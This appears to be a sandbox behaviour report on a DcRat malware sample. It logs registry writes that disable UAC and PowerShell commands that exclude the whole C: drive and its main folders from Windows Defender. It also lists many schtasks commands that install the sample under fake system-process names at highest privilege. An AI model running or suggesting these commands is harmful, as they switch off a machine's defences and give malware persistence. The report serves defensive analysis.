Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	csrss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	taskhostw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	taskhostw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	dllhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	csrss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	System.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	wininit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	dllhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Registry.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Registry.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	unsecapp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Registry.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	System.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	wininit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	winlogon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	dllhost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
C:\Users\Admin\AppData\Local\Temp\d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"
1⤵
- DcRat
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:4884
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:2420
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:1896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:4436
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:4896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:4464
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:2684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:3784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:1844
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:2460
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\v0XtNn8zIq.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5100
- - C:\Windows\system32\w32tm.exe
    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
    3⤵
    PID:4148
- - C:\Users\Admin\AppData\Local\Temp\d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe
    "C:\Users\Admin\AppData\Local\Temp\d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe"
    3⤵
    - UAC bypass
    - Checks computer location settings
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - System policy modification
    PID:492
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4252
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:1608
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:1776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4812
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:1556
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2800
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:3460
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2420
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4952
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\sFa82cOwXa.bat"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3188
    - - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        5⤵
        
        PID:1696
    - - C:\Program Files\Crashpad\reports\wininit.exe
        
        "C:\Program Files\Crashpad\reports\wininit.exe"
        5⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:1584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\csrss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4156

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3476

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\lsass.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\All Users\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\Windows\Prefetch\ReadyBoot\dwm.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2500

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\Prefetch\ReadyBoot\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Windows\Prefetch\ReadyBoot\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Portable Devices\Registry.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3932

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\Registry.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3672

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Portable Devices\Registry.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Windows\PolicyDefinitions\uk-UA\dwm.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\PolicyDefinitions\uk-UA\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3520

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Windows\PolicyDefinitions\uk-UA\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Portable Devices\taskhostw.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3496

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\taskhostw.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1208

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Portable Devices\taskhostw.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Program Files\Internet Explorer\SIGNUP\sppsvc.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\SIGNUP\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Program Files\Internet Explorer\SIGNUP\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\sihost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3972

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\sihost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 5 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\sihost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2560

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4412

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4224

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Media Player\Network Sharing\sppsvc.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3572

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Network Sharing\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Media Player\Network Sharing\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3488

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2812

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4184

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Defender\ja-JP\Idle.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\ja-JP\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Defender\ja-JP\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4160

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Desktop\System.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Public\Desktop\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Desktop\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ced" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Packages\d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce" /sc ONLOGON /tr "'C:\Users\All Users\Packages\d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ced" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Packages\d80fa7b3ff6a9ccf612307c00a81e470e63c53c6d3370ea7f5490de4f5f477ce.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Program Files\WindowsPowerShell\explorer.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\explorer.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4280

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Program Files\WindowsPowerShell\explorer.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1536

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 5 /tr "'C:\Windows\en-US\sysmon.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:820

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Windows\en-US\sysmon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 13 /tr "'C:\Windows\en-US\sysmon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
